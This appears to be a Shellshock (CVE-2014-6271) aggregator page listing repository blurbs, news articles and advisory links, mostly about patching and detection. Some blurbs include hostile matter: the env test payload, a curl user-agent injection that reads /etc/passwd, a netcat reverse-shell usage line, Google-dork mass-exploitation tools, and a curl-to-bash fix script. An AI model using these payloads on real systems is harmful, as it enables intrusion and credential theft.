Autoit Malware Scripts. A series of scripts written around 2014/15. Made purely for fun and learning. Note that all of these scripts were tested on the Windows 7 operating system as well as on the Safari, Chrome and Opera versions of that year. RunPE - RunPEx64: A RunPE is a script made to execute

Patch for CVE-2014-6271: securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Usage: install ansible on your local host; add the servers you wish to patch to inventory; run ansible-playbook ./deploy.yml -i inventory

Kickoff issue

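About US. Purpose: Create places and opportunities for sharing information about {something} and for working on it. Activities: Regular meetings. Held every other week. For the time being we will try holding them in spaces that are free to use. We will take care not to monopolize them. Content (this is a draft, suggestions are welcome): short presentations and sharing; code I wrote; handy tools and languages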

Plugins for nagios used by Voxer, made specifically for SmartOS

Voxer Nagios Plugins: Plugins for nagios used by Voxer, made specifically for SmartOS. Plugins: check_shellshock: Check bash for CVE-2014-6271 (shellshock). $ check_shellshock ok: bash is secure against shellshock You can pass an optional binary to check as the first argument, defaults to bash in your $PATH. $ check_shellshock /bin/bash critical: /bin/bash is vulnerable to shellshoc

This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271

shellshocker-python This is a Python Application that helps you detect if your machine that run Bash is vulnerable by CVE-2014-6271

CVE-2014-6271 An automated way to fix bash. Testing for the Vulnerability: You can determine if you are vulnerable by executing this test: env x='() { :;}; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability: Run this on the command line. You may be prompted to enter your password. bash <( curl -s raw.githubusercontent.com/mattclegg/CVE-20

Search google for shellshock vulnerable sites

shellshock-hunter-google Search Google and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock. Installation: Requires Python 2.7. pip install --user selenium gevent; git clone github.com/DanMcInerney/shellshock-hunter-google; cd shellshock-hunter-google/ Example: python shellshock-hunter-google.py -

CLI tool to check via node.js if you have a vulnerable bash Shellshock

CLI tool to check via node.js if you have a vulnerable bash Shellshock (CVE-2014-6271). Install: npm install shellshock -g Execute: shellshock Output: ✗ vulnerable bash or ✓ bash not vulnerable Contributors: neydroid

Wrapper for /bin/bash that mitigates 'shellshock'

bash-shellshock wrapper: This is a small wrapper around /bin/bash that refuses to start bash if any environment variables start with '('. It can also be run in a log-only mode and a mode that strips these 'bad' environment variables. You can install this as a temporary workaround if you don't fully trust the latest patches for CVE-2014-6271 and CVE-2014

a collection of best pentest resources

pentest-tools a collection of best pentest resources. Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Contents: Online Resources, Penetration Testing Resources, Exploit Development, Open Source Intelligence (OSINT) Resources, Social

Awesome Penetration Testing: A collection of awesome penetration testing resources. This project is supported by Netsparker Web Application Security Scanner. Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Your contributions and

A collection of awesome penetration testing resources, tools and other shiny things

Awesome Penetration Testing: A collection of awesome penetration testing resources. Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Your contributions and suggestions are heartily welcome (✿◕‿◕). Please check the Contr

OVAL For CentOS

OVAL-For-EL 中文 (Chinese version) English (English version). Features: CentOS OVAL; split OVAL by severity; automatic update and revise with official security. Supports (OS / Release / Upstream / Status): redhat / RHEL5 - RHEL8 / www.redhat.com/security/data/oval/ / syncing; centos / EL5 - EL8 / www.redhat.com/security/data/oval/ / syncing. Scripts: scripts/rh2el.py

Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)

debian-lenny-bash_3252-cve-2014-6271 Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64) You can test the flaw by running: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

shellshock-exploit this script for exploit #cve-2014-6271, NOTE you should edit the target. HTB: www.hackthebox.eu/home/users/profile/14397 Twitter: twitter.com/MoayadAlmalat

Automated vulnerability creation framework

Introduction: The following project is created in order to mitigate the problem of applying vulnerabilities to already existing machines for educational purposes. A vulnerability is a programmer's unintended mistake in a program’s source code, misconfiguration or hardware design mistake that can lead to a malicious or unexpected behavior. The field of cyber security i

An automated vulnerability testing framework.

Auto Vulnerability Tester: An extensible automated vulnerability testing framework written in Python3 by Nicholas Lochner for CS460 at the University of Illinois at Urbana-Champaign. All code was written by Nicholas Lochner, except for "heartbleed.py", which is a modified version of the Heartbleed proof of concept by Jared Stafford. The source is licensed under the GNU

Written for CVE-2014-6271

Cgi-bin_bash_Reverse POC for CVE-2014-6271 Src: gist.github.com/matjohn2/bc9689c60d4c9c5a2538

Exploit script by b01u

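CVE-2014-6271.py I wrote a script; the implementation uses Google IPs that are not blocked, so it can be used directly without circumventing the firewall. Features: batch detection of the Bash vulnerability via Google; exploiting a given URL; statistics, roughly to get a sense of how common the Bash vulnerability is (in testing, about one in 500 URLs turned out to have an exploitable Bash vulnerability); writing the vulnerable URLs to a file. Usage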

Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock

Shellshock-Vulnerability-Scan Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock. Download app from play store: play.google.com/store/apps/details?id=inindiandragonshellshockshellshockvulnerabilityscan

This offline tool is not supported and is provided for informational purposes only.

bashbug-shellshock-test This offline tool is not supported and is provided for informational purposes only. This tool is dependent on Python 2.7. ''' ' ' Shellshock Test - CVE-2014-6271 ' Written by Tripwire VERT (www.tripwire.com/vert) ' ' This offline tool is not supported and is provided for informational purposes only ' T

Scripts associated with Bourne shell ENV function parsing vulnerability CVE-2014-6271

shellshock scripts associated with Bourne shell ENV function parsing vulnerability CVE-2014-6271. dhcp_mon.py - This script monitors DHCP frames for potentially malicious characters within BOOTP and DHCP reply fields

This cookbook keeps bash packages at the latest version

bash Cookbook: This cookbook keeps bash packages at the latest version. CVE-2014-6271: seclists.org/oss-sec/2014/q3/649 Requirements: packages: apt - manage packages in ubuntu and debian; yum - manage packages in RHEL family. Usage: Just include bash in your node's run_list: { "name":"my_node", "run_list": [ "recipe[bash]" ] }

Exploit GNU Bash Env Command Injection via Google.

kbash Exploit GNU Bash Env Command Injection via Google CVE-2014-6271 Version 21 usage Batch Exploit GNU Bash Env Command Injection base on Google Version 21 optional arguments: -h, --help show this help message and exit -u URL specific a single Target Url -d DORK Custom Google Dork,Using Google Search to find targets -t THREAD_COUNT thre

patched-bash-4.3 for CVE-2014-6271

patched-bash-4.3 patched-bash-4.3 for CVE-2014-6271. This is just bash 4.3, pulled from the gnu website, and patched with the patches available on 9/26/2014, including the pkgsrc functionality changes that just disable the silly "execute functions in env variables" altogether. The patches are also included here, but I've already applied them to the sourcecode (fo

bashfix (for OSX) copied from StackOverflow answer here: apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851 Usage: git clone github.com/yanicklandry/bashfix.git ~/bashfix; chmod a+x ~/bashfix/bash_fix.sh; ~/bashfix/bash_fix.sh Test: After executing: env x='() { :;}; echo vulne

shellshocker.sh This is ShellScript for CVE-2014-6271 ReverseShell

Ansible Role Configures Host to be a Target in a Cyber Range

cyber-range-target This role endeavors to simplify building a host for a cyber range. This role is for assessment purposes only. Note: This has the potential to render a host vulnerable. Use with care. Requirements: Ansible 2.4 Role Variables: --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

My adventures and write-ups from pwnable.kr. Don't look, there are spoilers!

Pwnable Where Nick tries to hack and constantly fails. No peeking, there be spoilers below! Toddler's Bottle fd #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } // Convert argv[1

Some bash scripts I use.

bash Some bash scripts I use. Updated to include a quick test for CVE-2014-6271 (Shellshock): #!/bin/sh if [ "$SHELL" = "/bin/bash" ] then echo "You are using Bash" echo "$BASH_VERSION" env test='() { :; }; echo This version is vulnerable' bash -c 'echo ' fi I added a Wiki article that describes the settings I us

Project 9 - Honeypots. Honeypots Deployed: I used the Modern Honey Network (MHN) to complete the assignment for Week 9. In total, I created five Ubuntu 14.04 honeypots. All of the honeypots, including the MHN admin web application, were hosted in the Google Cloud. Honeypots: Ubuntu 14.04 - Dionaea with HTTP: Goal is to trap malware that exploits vulnerabilities in an exposed net

Remote Bash Execution

RBE Remote Bash Execution. This POC (proof of concept) is for EDUCATIONAL PURPOSES ONLY! Please, do not use it with wrong intents in mind. We set up a simple PHP website and a Python executable that exploits the bash shellshock vulnerability. Development: Please note that all the following tests were done in a local controlled environment for educational purposes only. Do NOT do

CVE-2014-6271

Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell

CVE-2014-6271 python27 Start listening on your machine: nc -l -p 4444 Run python script by the rule below: python shellpoc.py <host> <vulnerable CGI> <attackhost/IP> python shellpoc.py 101010101 /cgi-bin/status 1010101/4444 Enjoy

Quick and dirty nessus .audit file to check if bash is vulnerable to CVE-2014-6271

Nessus_CVE-2014-6271_check Quick and dirty nessus audit file to check if bash is vulnerable to CVE-2014-6271

CVE-2014-6271_Test CVE-2014-6271_Test Obviously, this project is used to check if a server with cgi enabled is affected with CVE-2014-6271 (aka shellshock). Dependency: Need GoogleSearchCrawler. Usage: e.g. python exp.py -g www.google.com This will test urls collected from google search result with keyword in file keywords. Run python exp.py to see details

an auto script to fix CVE-2014-6271 bash vulnerability

bash-up an auto script to fix CVE-2014-6271 bash vulnerability

ShellShock Test

Shellshock Test: ShellShock test checks for the recent CVE-2014-6271. Live: www.dr4cun0.com/shellshock/ Prerequisites: Apache Server running php. If you want to use my proxy, contact me. Questions and suggestions can be sent to: dhaval(at)dr4cun0.com

Simple script to check for CVE-2014-6271

shocknaww Simple script to check for CVE-2014-6271. Example Usage: ./shocknaww.py foobar/cgi-bin/foo Sample vulnerable environment: From the parent directory, run the following: python -m CGIHTTPServer Now use shocknaww against your localhost test server: ./shocknaww.py 127.0.0.1:8000/test.py

CVE-2014-6271 RCE tool

BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234. Developer : Andy Yang Version : 010 License : GPLv3

docker_CVE-2014-6271 docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory docker run -it -d -p 8080:80 DOCKERIMAGENAME verify execution with: docker ps verify web server execution: localhost:8080 exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \localhost:8080/cgi-bin/vulnerable

Demo Container Security App

shellshocked Demo Container Security App. This application contains known security vulnerabilities for demonstration purposes only. * Do not use this anywhere * This is heavily based on the excellent demo at github.com/opsxcq/exploit-CVE-2014-6271, but modified to run on Kubernetes

CVE-2014-6271 Python implementation of CVE-2014-6271: IP Fire (<= 2.15) ShellShock RCE. Exploit is automatic. See ./CVE-2014-6271.py --help for a full range of switches

awesome hacking chinese version

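Awesome Hacking (Chinese version). English Version. A curated list of awesome hacking resources, inspired by awesome-machine-learning. If you want to contribute to this list (you are welcome to), send me a pull request on GitHub or contact me @carpedm20. For a list of free hacking books available for download, click here. Table of Contents: System: Tutorials, Tools, Docker, General. Reverse Engineering: Tutorials, Tools, General. Web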

Awesome Security: A collection of awesome software, libraries, documents, books, resources and cool stuff about security. Inspired by awesome-php, awesome-python. Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources. Awesome Security Network Scann

Awesome Hacking: A curated list of awesome Hacking. Inspired by awesome-machine-learning. If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20. For a list of free hacking books available for download, go here. Table of Contents: System: Tutorials, Tools, Docker, General. Reverse Engineering: Tutorials, Tools, General. Web: Tools, General

Shellshock exploit + vulnerable environment

Shellshock exploit + vulnerable environment. Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

Docker image to exploit RCE, try for pentest methods and test container security solutions (trivy, falco and etc.)

Shellshock exploit + vulnerable environment. Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

Python tutorial series (translation) ~# python >>> import urllib >>> from bs4 import BeautifulSoup >>> url = urllib.urlopen("www.primalsecurity.net") >>> output = BeautifulSoup(url.read(), 'lxml') >>> output.title <title>Primal Security Podca

Recent Articles

HackinItaly: The Story Behind the Takedown of a 2,500-Strong QNAP NAS Botnet
BleepingComputer • Catalin Cimpanu • 10 Aug 2017

Last Friday, on August 4, a jury in the US found Fabio Gasperini, an Italian citizen, guilty of one misdemeanor for computer intrusion and was required to forfeit a botnet that was allegedly used to hijack remote servers and perform click fraud. 
Bleeping Computer reported on Gasperini's arrest and extradition to the US earlier this year, at the end of April. Today, we're circling back to provide an account of the events of how Gasperini built his botnet and how an investigation by

IT threat evolution Q3 2014
Securelist • David Emm Maria Garnaeva Victor Chebyshev Roman Unuchek Denis Makrushin Anton Ivanov • 18 Nov 2014

In July we published our in-depth analysis into a targeted attack campaign that we dubbed ‘Crouching Yeti’. This campaign is also known as ‘Energetic Bear’.
This campaign, which has been active since late 2010, has so far targeted the following sectors:  industrial/machinery, manufacturing, pharmaceutical, construction, education and information technology.  So far there have been more than 2,800 victims worldwide, and we have been able to identify 101 d...

VXers Shellshocking embedded BusyBox boxen
The Register • Darren Pauli • 17 Nov 2014

It's 2014 and some people are still using default user names and passwords

Malware writers have crafted new wares to attack embedded devices running BusyBox and not yet patched against the ShellShock vulnerability, researcher Rhena Inocencio says.
Miscreants' tool of choice for such attacks is malware called "Bashlite" that, once executed on a victim machine, probes for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.
Trend Micro's Inocencio said the variant would download and...

Researcher Takes Wraps off Two Undisclosed Shellshock Vulnerabilities in Bash
Threatpost • Michael Mimoso • 03 Oct 2014

The Bash bug has kept Linux and UNIX administrators busy deploying a half-dozen patches, worrying about numerous Shellshock exploits in the wild, and laboring over a general uncertainty that the next supposed fix will break even more stuff.
Researcher Michal Zalewski, a longtime bug-hunter, has been front and center on some of the Bash research and last week said he had found two additional bugs in the Bourne Again Shell, details of which he’d kept to himself until yesterday.
Za...

VMware Begins to Patch Bash Issues Across Product Line
Threatpost • Chris Brook • 01 Oct 2014

Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors’ hands in a similar fashion.
Virtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.
For the most part the company still has its hands full.
According to yesterday’s security advisory, it’s currently in the middle ...

Third patch brings more admin Shellshock for the battered and Bashed
The Register • Darren Pauli • 30 Sep 2014

'Okay we got it THIS time'

A third patch, from Red Hat engineer Florian Weimer, has been released for the vulnerable Bash Unix command-line interpreter, closing off flaws found in two previous fixes.
Weimer's unofficial fix was adopted upstream by Bash project maintainer Chet Ramey and released as Bash-4.3 Official Patch 27 (bash43-027) which addressed a bunch of previously undisclosed flaws including two remote exploit bugs.
The first patch (CVE-2014-6271) released Wednesday when the Shellshock flaw dropped w...

SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
The Register • John Leyden • 29 Sep 2014

CloudPassage points to 'pervasive' threat of Bash bug

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage.
The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE-2014-6271 weakness in the Bourne-Again Shell (Bash) affecting most Unix and Linux-based systems.
"The Shellshock vulnerability is one of the most pervasive threat...

Oracle SHELLSHOCKER - data titan lists unpatchables
The Register • Neil McAllister in San Francisco • 27 Sep 2014

Database kingpin lists 32 products that can't be patched (yet) as GNU fixes second vuln

Oracle has confirmed that at least 32 of its products are affected by the vulnerability recently discovered in the Bash command-line interpreter – aka the "Shellshock" bug – including some of the company's pricey integrated hardware systems.
The database giant issued a security alert regarding the issue on Friday, warning that many Oracle customers will have to wait awhile longer to receive patches.
"Oracle is still investigating this issue and will provide fixes for affected pro...

Stunned by Shellshock Bash bug? Patch all you can – or be punished
The Register • John Leyden • 26 Sep 2014

UK data watchdog rolls up its sleeves, polishes truncheon

Updated The UK's privacy watchdog is urging organisations to protect their systems against the infamous Shellshock vulnerability in Bash – even though the full scope of the security bug remains unclear.
The Shellshock flaw affects Bash up to and including version 4.3. It's a vital component of many Linux and Unix systems, as well as networking kit and embedded devices. It's also present in the latest versions of Apple's OS X for Macs.
The flaw allows hackers to execute arbitrary co...

Shellshock and its early adopters
Securelist • Stefan Ortloff • 26 Sep 2014

Shortly after disclosure of the Bash bug called “Shellshock” we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.
The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here’s an example of how this attack appears in a webserver logfile:

The atta...

How to resolve Shellshock on Mac OS X, web servers and more
welivesecurity • Stephen Cobb • 25 Sep 2014

A serious software vulnerability called the “Bash Bug” or “Shellshock” has just come to light and it affects a wide range of computers and digital devices, many of which will need to be fixed to prevent them leaking information or being taken over by malicious persons. The systems affected include Mac OS X computers, many web servers, and some home networking devices like routers. This blog post offers some preliminary advice about what to do in response to Shellshock, as well as links t...

Hackers thrash Bash Shellshock bug: World races to cover hole
The Register • John Leyden • 25 Sep 2014

Update your gear now to avoid early attacks hitting the web

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.
But as "millions" of servers, PCs and devices lay vulnerable or are being updated, it's emerged the fix is incomplete.
The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – includ...

“Bash” (CVE-2014-6271) vulnerability – Q&A
Securelist • GReAT • 25 Sep 2014

The “bash” vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.
In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.
At the time of writing, the v...

Bash Exploit Reported, First Round of Patches Incomplete
Threatpost • Michael Mimoso • 25 Sep 2014

The urgency to patch systems against the Bash zero-day vulnerability has been cranked to 10 after reports of an exploit in the wild have been made public by AusCERT, the Computer Emergency Response Team of Australia.
This seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a malware sample that points to a bot being distributed by the exploit.
Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert...

Patch Bash NOW: 'Shellshock' bug blasts OS X, Linux systems wide open
The Register • John Leyden • 24 Sep 2014

CGI scripts to DHCP clients hit by Heartbleed-grade remote-code exec vuln

Updated A bug discovered in the widely used Bash command interpreter poses a critical security risk to Unix and Linux systems – and, thanks to their ubiquity, the internet at large.
It lands countless websites, servers, PCs, OS X Macs, various home routers, and more, in danger of hijacking by hackers.
The vulnerability is present in Bash up to and including version 4.3, and was discovered by Stephane Chazelas. It puts Apache web servers, in particular, at risk of compromise: CGI sc...

References

CWE-78
isories/61312http://secunia.com/advisories/61313http://secunia.com/advisories/61328http://secunia.com/advisories/61442http://secunia.com/advisories/61471http://secunia.com/advisories/61485http://secunia.com/advisories/61503http://secunia.com/advisories/61542http://secunia.com/advisories/61547http://secunia.com/advisories/61550http://secunia.com/advisories/61552http://secunia.com/advisories/61565http://secunia.com/advisories/61603http://secunia.com/advisories/61633http://secunia.com/advisories/61641http://secunia.com/advisories/61643http://secunia.com/advisories/61654http://secunia.com/advisories/61676http://secunia.com/advisories/61700http://secunia.com/advisories/61703http://secunia.com/advisories/61711http://secunia.com/advisories/61715http://secunia.com/advisories/61780http://secunia.com/advisories/61816http://secunia.com/advisories/61855http://secunia.com/advisories/61857http://secunia.com/advisories/61873http://secunia.com/advisories/62228http://secunia.com/advisories/62312http://secunia.com/advisories/62343http://support.apple.com/kb/HT6495http://support.novell.com/security/cve/CVE-2014-6271.htmlhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bashhttp://www.debian.org/security/2014/dsa-3032http://www.kb.cert.org/vuls/id/252743http://www.mandriva.com/security/advisories?name=MDVSA-2015:164http://www.novell.com/support/kb/doc.php?id=7015701http://www.novell.com/support/kb/doc.php?id=7015721http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.htmlhttp://www.qnap.com/i/en/support/con_show.php?cid=61http://www.securityfocus.com/archive/1/533593/100/0/threadedhttp://www.securityfocus.com/bid/70103http://www.ubuntu.com/usn/USN-2362-1http://www.us-cert.gov/ncas/alerts/TA14-268Ahttp://www.vmware.com/security/advisories/VMSA-2014-0010.htmlhttp://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0http://www-01.ibm.com/support/docview.wss?uid=isg3T1021272http://www-01.i
bm.com/support/docview.wss?uid=isg3T1021279http://www-01.ibm.com/support/docview.wss?uid=isg3T1021361http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004879http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004915http://www-01.ibm.com/support/docview.wss?uid=swg21685541http://www-01.ibm.com/support/docview.wss?uid=swg21685604http://www-01.ibm.com/support/docview.wss?uid=swg21685733http://www-01.ibm.com/support/docview.wss?uid=swg21685749http://www-01.ibm.com/support/docview.wss?uid=swg21685914http://www-01.ibm.com/support/docview.wss?uid=swg21686084http://www-01.ibm.com/support/docview.wss?uid=swg21686131http://www-01.ibm.com/support/docview.wss?uid=swg21686246http://www-01.ibm.com/support/docview.wss?uid=swg21686445http://www-01.ibm.com/support/docview.wss?uid=swg21686447http://www-01.ibm.com/support/docview.wss?uid=swg21686479http://www-01.ibm.com/support/docview.wss?uid=swg21686494http://www-01.ibm.com/support/docview.wss?uid=swg21687079http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315https://access.redhat.com/articles/1200223https://access.redhat.com/node/1200223https://bugzilla.redhat.com/show_bug.cgi?id=1141597https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixeshttps://kb.bluecoat.com/index?page=content&id=SA82https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648https://kc.mcafee.com/corporate/index?page=content&id=SB10085https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/https://support.apple.com/kb/HT6535https://support.citrix.com/article/CTX200217https://support.citrix.com/article/CTX200223https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.htmlhttps://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075https://support.hpe.com/hpsc/doc/publ
ic/display?docLocale=en_US&docId=emr_na-c04518183https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlertshttps://www.exploit-db.com/exploits/34879/https://www.exploit-db.com/exploits/37816/https://www.exploit-db.com/exploits/38849/https://www.exploit-db.com/exploits/39918/https://www.exploit-db.com/exploits/40619/https://www.exploit-db.com/exploits/40938/https://www.exploit-db.com/exploits/42938/https://www.suse.com/support/shellshock/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1294https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-7169https://usn.ubuntu.com/2362-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/39918/http://tools.cisco.com/security/center/viewAlert.x?alertId=35845